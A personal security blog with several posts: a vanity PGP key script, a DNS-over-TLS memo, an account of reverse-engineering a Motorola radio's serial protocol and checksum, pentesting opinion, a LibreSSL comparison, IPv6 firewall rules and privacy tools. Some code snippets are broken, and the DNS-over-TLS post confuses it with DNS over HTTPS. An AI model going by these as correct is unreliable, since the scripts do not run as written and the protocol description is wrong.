Generating a “Vanity” PGP Key ID Signature

Here’s a quick bash script I used to generated a “vanity” PGP key with the last two bytes (four characters) set to FFFF.

#!/usr/bin/env bash

while :
gpg --debug-quick-random -q --batch --gen-key << EOF
Key-Type: RSA
Key-Length: 2048
Name-Email: user@domain
Name-Real: Real Name
Passphrase: yourverylongpassphrasegoeshere

if gpg -q --list-keys | head -4 | tail -c 5 | grep FFFF
        echo Break
        exit 1
        gpg2 --batch -q --yes --delete-secret-and-public-key `gpg -q --list-keys
| head -4 | tail -n 1`


I also added no-secmem-warning to ~/.gnupg/options to suppress the insecure memory warnings. When I set it to a 1024-bit key, it only took about 3 hours, while 2048-bit took 20 hours across.

It goes without saying, my use of insecure randomness is a terrible idea for those facing a serious threat model. Also, you’re basically picking a number at random out of 65,535 hoping for the right combination – but I’m just having fun with it.

DNS over TLS: A Brief Analysis

The following is a quick write-up I presented to my senior leadership regarding DNS over TLS. It was rooted in the mistake presumption that Google was going to “enforce DNS-over-TLS”. In short. Interestingly, this system is currently in use by Android, but I do not believe this will ever attain mainstream adaptation.

High Level Summary

DNS over TLS is a 2016 protocol that allows clients to resolve a hostname over the HTTPS (TLS) protocol. The client will issue a GET request specifying the hostname and request type and the server will respond with the requested data in JSON. All requests are over TCP/853.

The implementation of DNS over TLS is in the user-space resolution libraries and should not may even be unnoticed by user-land application. From a security perspective, this has a noticeable but easily manageable security impact around TLS security and allowing traffic over port 853.

Except for Android, currently no major operating system natively supports DNS over TLS. I do not foresee this protocol gaining mass implementation nor do I see Google’s public DNS servers mandating it for all clients.

Relation to DNSSEC

DNSSEC and DNS over TLS are parallel features of the DNS protocol. DNSSEC is a DNS protocol extension that provides integrity, but fails to provide confidentiality. As such, a Man-in-the-Middle (MitM) attacker could identify potential endpoints or targets. The DNS over TLS protocol provides both integrity and confidentiality, independent of DNSSEC. Additionally, the DNS over TLS client and server does not communicate over the DNS protocol.

Security Implications

There are three (3) broad security implications from implementing DNS over TLS. These implications are specific to TLS, not DNS over TLS.

FIPS 140-2 Encryption Module

The FIPS 140-2 publication is a recommended standard for encrypted modules. As such, any encryption on government IT systems are subject to this standard. In the case of DNS-over-TLS, this must be through an approved encryption module, most typically OpenSSL.

TLS is not an encryption cipher. TLS is a protocol that provides three aspects of protection: Authentication via a certificate or user certificate, an encryption cipher and hashing mechanism.

Protocol Version

Any implementation of TLS over DNS would have to ensure that the TLS version is free from publicly known or feasible attacks. The current version of TLS is revision 1.2, with TLS 1.3 in draft format. All versions of TLS below 1.1 and all versions of Secure Socket Layer (SSL) are vulnerable to various attacks, namely POODLE and ORACLE.

Certificate Chain

Proper TLS implementations typically utilize a certificate signed by a trusted certificate authorities. In the case of DNS-over-TLS, this requires additional dependence on the certificate authorities for every resolution. This may not be a problem for an end-user who trusts commonly trusted root-level certificate authorities. However, root-level certificates are often subject to distrust or influence from hostile state actors and high-secure environments should not blindly trust the decision of Microsoft or Redhat.

Encryption Cipher and Hashing Mechanism

TLS is a mechanism to facilitate encryption over a network and the hashing algorithm provides data verification. Both encryption ciphers and hashing mechanisms are in slow flux and should be closely followed. For example, in 2015 numerous agencies and security researchers reported that they could compromise RC4 cipher. Google Security researchers reported that they can perform a collision attack against the SHA1 hashing algorithm. Both algorithms were widely implemented in the industry.

Open Connections

A TLS connection initialization is computationally expensive. Therefore, the RFC suggests that the client maintain an indefinite open TCP connection over port 853. This may require an additional firewall rule to the DNS server.


The DNS over TLS protocol was formalized in 2016. Due to its relatively young age, currently there are currently very few implementations.

As the RFC documentation specifies, DNS over TLS should be implemented at the host resolution library level, particularly the getaddrinfo(3) and gethostbyname(3) functions. As such, the operating system only needs to maintain library ABI compatibility, but the application does not need implement anything. Currently, only the Android operating system has implemented DNS over TLS while some Linux user-land tools can perform DNS over TLS resolutions.

Google Resolution

Google has currently implements DNS over TLS on,, 2001:4860:4860::8888 and 2001:4860:4860::8844. Google also offers a web-interface which submits a JSON GET request.

For example, to URL would resolve the hostname The formatted response is as follows:

Standard Implementation Method

There are several implementations of DNS over TLS encapsulated in simplified Docker containers. In summary, the containers utilize a standard web server to handle the HTTP layer and communicates to the DNS server over the DNS protocol. This is a standard method of isolating the HTTP layer from the application layer.

Future Speculation

I do not believe that the DNS over TLS protocol will attain mass implementation, nor that Google will mandate it for use of their DNS servers. There are three (3) primary reasons why:

  1. Architecture: Historically, short-term add-ons to a protocol are superseded by permanent change to the protocol or a parallel revision. If the goal is confidentiality, this can be achieved via an extension to the protocol.
  2. Performance: Per Google research, DNS is a bottleneck when a URL has multiple external sources. However, I suspect the current DNS resolution is still significantly faster. A UDP-based connection requires only a UDP socket with a simple sendto(2) call, whereas DNS over TLS requires multiple layers of conversion across potentially multiple machines. Specifically, from TLS to HTTP across the internet, converted to the DNS server and back across the same route.
  3. Standardization: There does not appear to be a TLS over DNS standardization. Most implementations utilize HTTP, but this is not specified in the RFC. Additionally, the JSON format differs between the implementations.


This paper is based on multiple sources. The primary sources are cited below.

That time I Reverse-Engineered the Motorola CBEP Protocol

This is the tale of how I reverse-engineered a Motorola CPS radio protocol to make it work on Linux. While this may have been of questionable legality and thus lost interest in the project, I learned a lot on how to reverse engineer. I’m writing this entry more than a year after I initially did this, so I may be a little rusty on the details, but this is the gist of it.

My father worked in radio communications so when he passed I inherited his old EOL Motorola XTS 3000. I got an FCC ham radio license and wanted to utilize this device in service of my fledgling new radio hobby. Turns out, this device was the Rolls Royce of radios in its day. It can operate within the ham bands, can do encryption, digital communication, P.25, D-Star, trunking, and pumps out a very clear signal. In short, this was a heavy-duty mission-radio.

Motorola XTS3000 Radio

So I purchased a new $30 lithium ion battery, a programming cable, I ran into a few unfortunate roadblocks. First two…

  1. This device cannot be front-face programmed, which is a fancy way of saying you cannot just set in an arbitrary frequency on the fly. Kinda sucks if you want to change to another random frequency.
  2. This could only be done by a proprietary Motorola CPS (Computer Programming Software) – but this was trivially easy to download.

…All of that was trivial compared to the next bomb-shell…

You could only program this device using a hardware serial port running on native 32-bit Windows. This means no Windows 7/8/10, no Virtual Machines, no Linux, no USB-to-Serial port.

Radio Reference users lamented that they were forced to maintain an old Windows XP laptop with a serial port for programming their device. I personally went out and purchased a $75 computer off Craigslist. Damn!

Up to this point, here are my thoughts: A serial RS-232 port is a “dumb” port compared to modern USB or PCI devices. In fact, serial does not even have a single standard, its whatever the device programmers decide. RS-232 is as close to raw data over a wire as you can get. So why doesn’t this work in a VM? And, why can’t I just capture this data, replay it and have the device function as normal?

Chipping Away at the Secret

I questioned the assumptions and put in an FTDI cross-over cable I made. One end went into the Windows machine, the other end went into My Linux machine, a final serial to radio cable connected to the device. This way my computer was essentially doing a Man-in-the-Middle (MitM) attack, but for serial.

FTDI Cross-over-Cable

I whipped up some C code to relay messages between the Windows machine and device. When I initialized the connection, the radio beeped! And then nothing happened…the software timed out and complained that the connection to the radio failed. I captured the initialization bytes 0x01,0x02,0x01,0x40,0xF7 and replaying them clearly made the radio do something, but immediately stopped afterwards.

Serial Capture Cable

I tried this process several times, but it failed. Annoyed, I looked into purchasing an RS-232 snooping cable: a cable with two regular connections that transfer data as normal and two tap ports, one that taps pins 2 and another that taps pin 3. For whatever reason, well-built cables cost upwards of $100 online and proper hardware snooping devices cost $500, way above my budget. So I decided it was much cheaper to build my own damn cable. I have the program I whipped up to read the bits from the transfer.

And it worked!

I saw a flurry of bits fly across the terminal. In the mix, I noticed a subtle pattern: A pause in the transfer, 7 bytes sent back, echoed back, another pause, and then another flurry of bits. For example, I saw:


Later on I saw:


and then


If you didn’t catch it, the last two bytes are increasing by 0x20 (32) while the last bit ends in 9. (Spoiler, the repeating 9 was coincidental). I interpreted this as a value increasing by 32, and the last byte being a checksum. This was actually a lucky half-guess, because I had no way to know that.

Again I tried to replay these same bits, I ran into the same failure.

I briefly attempted to run the program in IdaPro, GNU Debugger for Windows and Immunity Debugger, but this approach failed and I am still not certain why. For example, I found a string that was clearly only utilized in one place in the binary and set an IdaPro breakpoint when the binary accessed that memory address. But for whatever reason, it did not break. Moreover, I learned the hard-way that the Win32 GUI API controls the application flow and is far from linear, so I could not just break after, say, 30,000 GUI instructions and expect to reliably step into the desired code.

I also briefly tried to use some RS-232 snooping tools, but every tool I found relied on a modern .NET framework not available on Windows XP. Moving on…

Win32 API Monitor

A Windows XP zealot on IRC informed me of a Win32 API monitoring application that would monitor DLL files and produce a list of when they were executed and their arguments. That might be useful.

I spent some time reading up on how Windows communicates over Serial: It uses CreateFileA() to open the COM1 port, typically listed as "\\.\COM1" and then use ReadFileA() call, similar to Unix’s read(2) syscall. I expected to see this in the API capture.

Nope! Instead, I saw that the binary used CreateFileA() against Commsb9. Next, I saw ReadFileA(), sending over 0xF5,0x01,0x02,0x01,0x40 but not the trailing 0xF7. Win32 API even told me driver was communicating to it using USB IOCTLs — not only is this device serial, USB was barely invented when this program was created. What’s going on here?

Reading the code, I identified that these Read/Write commands were taking place in VcomSB96.dll, and filtering by that DLL file, I saw that it was loading Commsb96.sys and Commsbep.sys. In my experience sys files are always driver files.

The Driver

Looks like we are working with a driver. With my limited background in writing a Linux USB driver, Microsoft’s excellent documentation and websites like this, I had an idea of what I needed to hunt for. The C code would look like this:

NTSTATUS DriverEntry( IN PDRIVER_OBJECT pDriverObject,
NTSTATUS ntStatus = 0;
UNICODE_STRING deviceNameUnicodeString, deviceSymLinkUnicodeString;
pDriverObject->DriverUnload = OnUnload;
pDriverObject->MajorFunction[IRP_MJ_CREATE] = Function_IRP_MJ_CREATE;
pDriverObject->MajorFunction[IRP_MJ_CLOSE] = Function_IRP_MJ_CLOSE;
pDriverObject->MajorFunction[IRP_MJ_DEVICE_CONTROL] = Function_IRP_DEVICE_CONTROL;


This snippet is assigning the driver methods to the pDriverObject struct. I opened up the Commsb96.sys in IdaPro, expecting to hunt through, starting from the obligatorily exported DriverEntry symbol and trace where the DeviceIoControl initializes. To my surprise I saw this:

IdaPro with Full Symbols

Wow, that was easy. Turns out, a now defunct company called Vireo Software, Inc produced this driver in 1997 and failed to strip out the kernel symbols, making it much easier to reverse. Looks like they used C++ and compiled with optimization. That produced assembly that is a bit difficult to follow, but which I eventually traced back to where the DeviceIoControl messages landed in the kernel, and from there tracked down the USB message that Win32 API Monitor detected.

I finally traced code that read 5 bytes form the stack, and ran them through a loop, calculated a single byte, then returned that byte. I wish I could claim to have written the code below, but it was actually done by another IRC contact. He had a (probably bootleg) professional version of IdaPro that produced the following C code.

unsigned char sbCRC(const unsigned char *msgbuf, const int len) {
     const unsigned char table[8] = {}; // REDACTED FROM THE BLOG TO AVOID LEGAL TROUBLE!

     unsigned char a, b, n = 0;
     int i = 0;

     while (i < len) {
          n = (unsigned char)*(msgbuf + i) ^ n;
          a = ((unsigned char)((signed char)n >> 1) >> 1) ^ n;
          b = a;
          a = ((signed char)a << 1) & 0xF0;
          b = (signed char)b >> 1;
          if (b & 0x80)
               b = ~b;
          n = (a + (b & 0x0F)) ^ table[n & 0x07];

     return n;

I tested this function against known values such as 0xF5,0x11,0x20,0x00,0x00,0x00 that I cited before, ran it through the function and it resulted in 0xD9. Boom! Checksum reversed!

The Missing Link – RS-232 Flow Control

Coming of age in the 2000s, I learned about effectively full-duplex buses such as USB or PCI. In modern buses, you can effectively asynchronously send data but the RS-232 often requires manual flow-control by the CTS, DSR, RTS and DTR pins.

Providentially, around this time I found the amazing tool 232Analyzer, which was the only tool of its sort that did not require a modern .NET framework. Had I found it earlier, this would have saved me a lot of time! But I learned so much along this process.

232Analyzer Capture

Putting it all Together

With that, I modified my python code to emulate the flow control, calculate the checksum and sent the resulting bytes over. And this time….it worked! I could replay messages from original CPS and the radio responded with the same flutter of meaningless data.

Asking around on forums, IRC and reading up on the Motorola hardware, I learned that these sorts of devices do not request or set specific values from the radio as an API abstraction layer might do. Instead, you request memory locations and interpreting those locations according to a pre-known memory map. I deduced that the 0xF5,0x11 bytes meant “read”, the 0x20 is some sort of divider (or maybe more?), the next 3 bytes are memory locations, and the final byte is a checksum.

Armed with this hypothesis, I found the memory location of the device serial number and my code could read serial. I tested this on my second radio and it resulted it correctly retrieved the serial number.

To find other values, I recorded reading the radio memory, made a single change, then read the radio memory again and compared the difference to isolate values. I was able to find frequency values, channel names, signal strength values, etc! With time, I could mapped out the entire address space! I even found the write-prefix, but was too scared to test it in fears of bricking my radio.

Anti-Climactic Ending

Somewhere along this, I wondered “wait…is this legal?” I contacted the EFF. They were extremely eager to get back to me and after a long conversation the lawyer suspected that because the CPS has a copyright notice and I did not…um…come into acquisition of it through a financial transaction (sure, that phrasing works), it was likely illegal to distribute the reverse-engineered code.

And mapping out the memory got really tedious and annoying. And I started watching The Walking Dead.

And right about here my journey ended.


But I learned so much!

  1. How Windows device drivers work
  2. Windows API calls (turns out, they don’t suck)
  3. How to reverse engineer code with IdaPro
  4. How RS-232 traffic flow works
  5. A buncha tools!

Thoughts? Should I have kept going?

Two Types of Penetration Testers

There are two types of penetration testers in the industry.

Those who identify risk and vulnerabilities beyond a simple Nexpose/Nessus/Qualys scan. And those who want to “win”.

The job of the “winner” is to get DA on their client’s network. Great! But once they’ve gotten it, they show off. Look how much information I can get with the DA account! I can get access to these databases and these spreadsheets. Sensitive Information! Be afraid! I pwned you noobs!!!

The other type of penetration tester also seeks DA. He finds it. Great! Now he moves on to another vulnerability. And then another. Can I get DA another way? Maybe? Okay, what else is exploitable here. Along the way if he finds sensitive information, he presents it to the client. But his job is not focused on presenting information, its on finding avenues to find information.

If the “winner” focuses on one issue. He writes his report and presents it to the client. The client is enamored, impressed, even afraid. But if another “winner” penetration tester were to come in tomorrow, because the first only focused on one issue, the second would just find another avenue. A third might find a third issue. Until they are merely playing wack-a-mole.

The second type reports the issues he identified, an array of vulnerabilities, ranked by severity. He may briefly present information he was able to access, but then moves on. His job is to work towards resolution, not playing hacker. Overall security is enhanced.

Thoughts? No? I didn’t think so, no one reads this blog.

LibreSSL: The Secure OpenSSL Alternative

I originally published the following article with the InfoSec Institute, but I figured I would re-publish it on my personal blog.

Perhaps the most devastating vulnerability in recent years was OpenSSL’s Heartbleed exposure. This is just the latest in a series of major vulnerabilities affecting a linchpin security software package. Why does this continue to happen? What are the solutions? Moreover, could LibreSSL be an industry-level replacement to OpenSSL?

OpenSSL was initially developed in 1995 as a commercial-grade, open-source and fully featured toolkit for implementing Secure Socket Layer (SSL) and Transport Layer Security (TLS), and as a general-purpose cryptographic software library. OpenSSL was adopted by various operating systems and major applications as their primary cryptographic library, including all main Linux distributions, BSD variants, Solaris and is heavily utilized by Windows. However, perhaps due to its success, rapid adaption and diverse implementation, the quality of the code eroded. What should be mature code with a relatively simple and concise objective has grown to become an array of tangentially related features, patchwork of “quick fixes” and excessive backwards compatibility and portability to the detriment of the security of product.

Enter LibreSSL. LibreSSL began as a fork of OpenSSL 1.0.1g. Developed by the OpenBSD team, LibreSSL is designed to be a drop-in replacement of OpenSSL. Its stated goals are code modernization, security and software development best practice. In the past 18 months, the code has made impressive strides in said goals. It has also made controversial decisions, including removing widely used features and jettisoning oft-used government standards. Could this software package replace OpenSSL?

This paper seeks to compare OpenSSL and LibreSSL as the main encryption library for production environments by:

  • Direction and Progress
  • Security
  • Performance
  • Compatibility and Portability
  • Functionality

Code Modernization and Cleanup

A primary critique of OpenSSL is that the code-sacrificed industry best practices, code review and remediation, and structured development in favor of rapid portability and functionality. Specifically, they argued the following problems:

  • Multiple implementations of a task, depending on the OS, architecture or compiler, resulting in multiple points of failure.
  • Unorthodox implementations to accommodate failures in Operating Systems, architectures or compilers.
  • Code unreadability, such as a labyrinth of C preprocessor statements.
  • Custom implementation of standard C library calls, such as printf() or memory management.
  • A patchwork of “quick-fixes” rather than solving fundamental design flaws.


OpenSSL aims for portability across all systems, including those that do not support standard C functions. It accomplishes this by creating an abstraction layer and reimplementing APIs that should be in provided by the OS. This resulted in a non-standard OpenSSL C Library variant, distinct from standard C that does not undergo the same level of public scrutiny, maturity and secure best practice.

LibreSSL tackles these issues assuming that the code is designed for a modern, POSIX compliant OS on a modern architecture using a compiler that conforms to standard C. Namely, LibreSSL assumes that the target system is OpenBSD. In cases where an OpenBSD-specific C call does not exist, LibreSSL ports only that function and maintains the same symbol, as not to create an abstraction layer.

Additionally, this assumption afforded LibreSSL developers the freedom to remove antiquated, CPU-specific, OS-specific, compiler-specific or otherwise non-standard code. One example of this is the get_ip() function which parses an IP address string and returns each octet in a character array. Rather than utilizing gethostbyname(), which became part of the GNU C Library 1997, OpenSSL chose this implementation because Visual C 1.52c, dated 1995, contained an unresolved DLL error with the sscanf() function. To date, LibreSSL removed 140,000 lines of code, or 23%.

Memory Management

OpenSSL insisted on portability on every platform, irrespective of its capabilities. This became problematic when the OS or the C Library was unable to meet cryptographic requirements. Examples included:

  • Operating systems that did not contain the malloc(3) function
  • Unacceptable latency when allocating or freeing memory
  • Inability to allocate 64-bit objects

OpenSSL solved these problems by developing an internal memory management system, distinct from the OS’s. This layer was a fixed Last-in-First-out stack that assigned memory to requesting objects, but never sanitized or freed used memory back to the OS. While this assisted in portability, it created numerous challenges, namely:

  • OpenSSL code maintenance and readability became extremely difficult.
  • Common debuggers, such as Valgrind, are designed to analyze fixed-buffers assigned to individual variables. Abstracting memory management from the OS made buffer overflow detection virtually impossible.
  • The LIFO memory architecture virtually ensured that exposed memory contains sensitive information, as evident by the Heartbleed vulnerability.
  • Creating memory leaks that could not be detected by garbage collectors.

LibreSSL simplified the process by shifting the responsibility of memory management back to the OS. To this end, LibreSSL entirely removed the OpenSSL memory management layer, simplified the higher-level macros, and utilized POSIX C libraries. Developers comment that this revealed thousands of buffer overflow errors, which were subsequently corrected.

Ticket Remediation

The OpenSSL Software Foundation (OSF) appeared slow or uninterested in remediating documented issues. As a metric, upon LibreSSL’s initial release in April 2014, OpenSSL’s bug ticket system contained 1104 open tickets with the earliest dating back to April 2002. To date, 115 item from that list still unremediated. The stagnation of ticket remediation exacerbated disinterest in community contribution. As part of its goal, LibreSSL remediated all open tickets and shared newly vulnerability newly identified vulnerabilities to the OpenSSL team.


Security is a central goal for LibreSSL, which they aim to achieve by increasing code readability and review, removing insecure functionality and memory sanitization.

Code Readability

As discussed, LibreSSL assumes a level of competence of the underlying platform. This afforded LibreSSL developers the freedom to remove large swaths of confusing or unwieldy code, such as nested preprocessor statements for specific OSs or architectures. Though this may not immediately result in enhanced security, it has allow outside developers to review the code with greater ease and contribute to security and overall quality.

Functionality Removal

With the disclosure of the POODLE vulnerability, security analysts deemed SSLv3 insecure and not for use in production environments. However, many environments still require SSLv3 for legacy purposes and are unable to migrate to TLSv1.1. To this end, OpenSSL maintains backwards compatibility with SSLv3 and all applications compiled for SSLv3 are still operational. Conversely, LibreSSL 2.2.2 entirely removed SSLv3 support. Additionally, LibreSSL removed weak or broken cipher suites, including the Secure Remote Password (SRP), Pre-Shared Key (PSK) and all Export ciphers. LibreSSL added support for ChaCha, GOST and IDEA ciphers. While LibreSSL’s decisions provide technically enhanced security, this may be negatively impactful in environments that require legacy SSLv3 support.


Random number generation is a critical aspect of cryptography. Without proper seeding, an attacker is able to predict private encryption keys.

OpenSSL relies on the operating system to generate random numbers. On UNIX and Unix-like systems, this typically means reading from /dev/urandom or /dev/random. However, in the event that OS is unable to generate random numbers, OpenSSL provides the RAND_add(3SSL) and RAND_seed(3SSL) API calls, allowing users to seed the PRNG function.

LibreSSL shifts the responsibility of random number generation entirely onto the OS. LibreSSL vestigially maintains the function for binary compatibility, but removed all associated code. It is worth noting that due to the lack of seeding, the initial release of LibreSSL contained a critical flaw in the PRNG function, where two forked processes contained the same PRNG seed and thus generated the same random data. This vulnerability was quickly patched.

Memory Sanitization

Memory sanitization is a central feature in LibreSSL that is lacking in OpenSSL. Prior to the deallocation of objects, LibreSSL explicitly zeros out memory using OpenBSD’s explicit_bzero(3) function. This proactively reduces the impact of memory exposure in the event of a future vulnerability or an unprivileged process that gains control of a tainted memory segment. The LibreSSL team created portable a module for OSs that do not have these OpenBSD-specific API calls.

Common Vulnerability Enumerations

Since LibreSSL is a fork of OpenSSL 1.0.1g, it is subject to many of the same issues and vulnerabilities that affect many of OpenSSL. From the date of LibreSSL’s initial release in April 2014, to today, there are 45 CVEs that affect OpenSSL. Of those, only twenty-four affected LibreSSL, with another one vulnerability only affects LibreSSL. This is demonstrable proof that LibreSSL has made strides in security.

FIPS 140-2 Compliance

The OSF sought to make OpenSSL FIPS 140-2 compliance. Consequently, OSF created the OpenSSL FIPS Object Module, which provides an API to invoke FIPS approved cryptographic functions. This is particularly important for Federal IT systems that are obligated to comply with FIPS 140-2. Conversely, LibreSSL removed the FIPS compliant module from its code, arguing that the FIPS 140-2 uses weak or broken ciphers and is detrimental to security. LibreSSL is neither FIPS 140-2 compliant nor is it a goal of the project. This is potentially impactful for risk-averse government IT systems that are required to comply with FIPS 140-2.


As discussed, LibreSSL was written specifically for OpenBSD and the OpenBSD team ported LibreSSL for modern OSs that conform to POSIX standards. Consequently, legacy systems or systems that do not conform to POSIX are unable to run LibreSSL.

Application Support

LibreSSL aims to be a drop-in replacement to OpenSSL with no changes to existing applications. LibreSSL achieves compatibility by maintaining exposed API calls, even if their functionality is nullified. However, many applications, such as Apache Web Server, must be minorly patched before it will link with LibreSSL. This is mostly due to removed features or removing unnecessarily exposed interfaces.

OS support

The LibreSSL team ported it to numerous operating systems, including Linux, Windows, FreeBSD, OS X, and Solaris. It is worth noting that outside of OpenBSD, no operating system has pre-compiled package-level support for LibreSSL. Thus, all binaries and applications must be manually compiled and manually upgraded. LibreSSL explicitly removed support for Classic Mac OS, 16-bit Windows, DOS, VAS, and OS/2.


Performance tests were performed on a stock Ubuntu 14.04 LTS install running kernel 3.19.0-28-generic using Apache 2.4.16. Both virtual machines were running on a single core from an Intel(R) Core(TM) i7-4712MQ CPU @ 2.30GHz CPU with 2 gigabytes of RAM. The tests were running OpenSSL 1.0.1g. and LibreSSL 2.3.0, respectively. The test utilized ApacheBench version 2.3 with 100,000 requests per test for a payload of 45-bytes.

In terms of speed, OpenSSL outperforms or is at best comparable to LibreSSL across all tested ciphers. The performance impact is attributed to the explicit memory sanitization operations within LibreSSL that are not present in OpenSSL and optimization features that were disabled in LibreSSL.


Both LibreSSL and OpenSSL have advantages and disadvantages, depending on a given application, requirement or tolerance.

From a purely security perspective, LibreSSL is the clear winner, by proactively addressing security concerns, disabling broken ciphers and protocols, and building security into the design. OpenSSL employs a reactive approach and fails to address adequately security in design. In addition, while they still share many of the same vulnerabilities, one can anticipate that LibreSSL will be subject to a diminishing number of shared vulnerabilities and less overall going forward.

However, this approach also has a downside. LibreSSL’s focus on security means that it is not backwards compatible with deprecated ciphers or protocols and therefore will not function in legacy environments. Additionally, LibreSSL’s stated refusal to comply with FIPS 140-2 effectively guarantees government systems and enterprise-level OSs will never utilize it.

OpenSSL outperforms LibreSSL in portability. This is not due to a failure in LibreSSL, but is instead a testament to OpenSSL’s successful adaptation. Since no major operating system currently supports LibreSSL, LibreSSL and dependent applications must be manually compiled and installed, rather than utilizing the package management systems in FreeBSD, Debian, Ubuntu or Redhat.

In terms of performance, OpenSSL exceeds LibreSSL across all ciphers. As stated, this is attributable to LibreSSL’s explicit memory sanitization operations. The performance may be negligible in low-availability applications, but can be impactful in large, latency-sensitive production environments.

Both LibreSSL and OpenSSL have their strengths and weaknesses. OpenBSD has demonstrated that LibreSSL is ready for production environments, but has yet to be widely deployed. Ultimately, the choice between LibreSSL and OpenSSL is a variant of the perennial question of security versus functionality.

IPv6 Firewall Rules

I setup a Hurricane Electric tunnel to get my house on IPv6 (Verizon fails to deliver!) and was given a /64 allocation. I then setup a Router Advertisement daemon to get every computer online. Yippee!

But, there’s a problem…now every computer in my house is exposed to the wrath of the Internet. While the Network Discovery (ND) addresses are “random”, you can still intercept a client’s address through a variety of means. So I setup some basic IPv6 firewall rules to protect my clients.

Here is my script:


# Default policy, this happens in the end
ip6tables -P FORWARD DROP

# Accept SSH
ip6tables -A FORWARD -p tcp --dport 22 -j ACCEPT

# Accept everything locally
ip6tables -A FORWARD -i eth0 -o he-ipv6 -j ACCEPT

# Accept all ICMPv6, kinda necessary 
ip6tables -A FORWARD -i he-ipv6 -o eth0 -p icmpv6 -j ACCEPT

# Accept all stateful connections, that we didn't initiate
ip6tables -A FORWARD -m state --state ESTABLISHED,RELATED -j ACCEPT

Here is an explanation:

  1. The default FORWARD policy is to drop all packets
  2. I accept all forwarded packets on port 22 (SSH) – This is because I frequently ssh into my personal machine while on the road.
  3. I accept all ICMPv6 packets: First because I want to be able to test pingings and such, but also because its required by IPv6
  4. I accept all packets for a connection that my clients initiated. This means I can arbitrarily connect out, but others cannot arbitrarily connect in.

I tested this out and it worked! There, now my personal home printer is not online 🙂

Giving credit where credit is due, borrowed a lot from Fabio Firmware.

Four Simple Technologies for Privacy We Should All Know

This recently PRISM scandal has made me concerned about security and privacy, even more than before. I truly do not think that the government is spying on me as an individual and will (hopefully) never kick down my doors and take me to the Ministry of Luv. I have nothing to hide. But that’s not the point. Its the principle. You have no right, neither moral nor practical, to monitor my communication. In fact, we have explicit rights protecting us!

But in the wake of the PRISM scandal, we now know with certainty that the government is actively monitoring everyone. Therefore, I would like to impart my knowledge of encryption to the public. Here are four simple ways to keep yourself safe from the government.

A) Pretty Good Privacy (PGP) – This is a widely used, tried and tested method of encrypting text and files prior to sending them to the end user. Because all encryption is done prior to the connection, this is one of the better systems out there.

Here’s how it works: You exchange public keys with whoever you want to communicate with. When you want to send the other person a message, you encrypt the data his public key (not your own). The end-user will decrypt the data with his private key (not yours). Conversely, if someone wants to send you a message, he will encrypt the message with your public key and you will then decrypt it with your (not his) private key.

If that’s confusing, think of it like giving people a lock-box that they can put contents in and lock and no one can unlock it but you. That lock-box is your public key. The key to the lock-box is your private key.

So, a few drawbacks to this method:

  • PGP’s major drawback is that without an infrastructure, anyone can create a fake public key in your name and send it around in your name. Then, he can intercept messages to you, decrypt them, modify them if desired, and send them back to you using your actual public key, and no one would be the wiser. Its a bit complicated, but entirely possible.
    • You easily can get around that by creating a “web of trust”, but it involves a bit more work.
    • You can create an infrastructure for PGP if you want. MIT hosts their famous key server, but there are several infrastructural problems with it.
  • Lets be real, its not 100% user-friendly or intuitive. Mailvelope is the best attempt I have seen to make it more user-friendly and I personally use it when not on Linux.
  • It is feasible that the NSA has the CPU and GPU power to brute-force a low-bit key.

If you are concerned about having your keys broken into, you can try using;

$ gpg --batch --gen-key << EOF > Key-Type: RSA
> Key-Length: 8192
> Key-Usage: Auth
> Name-Email: [Your email here]
> Name-Comment: [Some comment]

B) Tor, The Onion Protocol – The Tor protocol is a method of obscuring the originating source of a network connection. Tor accomplishes this by bouncing connections off of servers around the world. Each computer you bounce your connection off of knows the previous source and next destination, but does not know the two connections prior or two after. And given that all data through the network is encrypted, no one is able to meaningfully modify the intended next sources. After a number of hops, a final end-point will initiate the actual connection to the intended destination. That final destination perceives the end-point as the source of the connection, but does not know the original source.

Tor is largely used for anonymous web-surfing, but because it functions as a SOCKS5 proxy, it can be used for just about anything!

Another innovation of Tor is Hidden Services. In the aforementioned configuration, the client knows who the server is, but the server does not know who the client is. A Hidden Service is when a server hides its identity, but the client is still able to connect to it. The mechanisms are too complex to explain here, but you can read them on the Tor website.

You can download Tor here.

C) Bitcoin – Bitcoin is an operational electronic currency that are independent of any government. It offers security, anonymity, and is accepted by thousands of people worldwide.

Anonymity – User accounts, called Bitcoin addresses or simply addresses,  appear as 27-34 arbitrary numbers and letters such as 31uEbMgunupShBVTewXjtqbBv5MndwfXhb. In reality, addresses are the equivalent of public keys that are used by payers to sign transactions. Address are completely independent of names, addresses, numbers or any other identifying information. The user has control over them by having the corresponding private key, which again, does not have any associated identifying information.That’s more anonymous than a Swiss bank account!

Secure – Bitcoin uses the robust public-private key infrastructure to secure encryption between bitcoin sender and receiver. The sender of bitcoin (payer) obtains the receiver’s bitcoin address and digitally signs his bitcoins to the receiver. This makes electronic theft done by utilizing the Bitcoin system next to impossible.

The Bitcoin infrastructure has several components. Therefore, if you’re interested, I suggest you watch the following video. Its a bit dated, but n

D) Disk Encryption – Disk Encryption is when data is encrypted while it is stored on your hard-drive.

If someone were to obtain physical access to your machine, either through theft or government seizure (same thing?), they would be able to access everything on your machine, including services and systems you were currently logged in on such as Gmail or Facebook. Disk Encryption is a method of preventing the bad guys from accessing your machine. There are dozens of types of disk encryption. Before I talk about the exact implementations, I want you to understand the concept.

Disk Encryption means that everything on your computer is encrypted, rather than encrypting individual files one by one. However, files are only encrypted when they reside on the hard-drive. So, if you email out a file, it will not be encrypted during transmission. For that, you will need to use PGP or a related technology.

Windows has two main tools, the first is Microsoft Full Disk Encryption. However, this service is proprietary and will require you to have Windows Professional. A free alternative is TrueCrypt, which functions in a similar manor.

One note about disk encryption tools: It is more than theoretically possible to recover the hard-drive encryption keys from the memory. It requires the attacker to literally freeze the RAM with a cooling agent, soft-reboot the machine, then boot into a custom system that performs a RAM-dump via Firewire — I have personally seen this done, it is not just theory.

Conclusion and Comments

The aforementioned technologies are, to the best of my knowledge, technically secure against even to the most sophisticated attackers. However, there is one major weak link in this chain: the end-user. Many times, users make simple mistakes which allow attackers to circumvent the entire protective scheme.

For example, PGP and Disk Encryption ultimately require a password to protect the encryption, in the event that the attacker is able to gain physical access to the hard-drive or private keys. If your password is weak, such as being under 20 characters, your data is liable for decryption.

In the future, I hope that all of these technologies become more easy to use and user-friendly.

The only exception I can think of is if the computing power of the NSA is strong enough to break any of these mechanisms. That’s entirely possible. And violence trumps even that — put a gun to the head of even the most rabid Zionist and I’ll give anyone want they want to save his life.

That aside…happy encrypting!

Hotspot Hijacking & Password Capturing

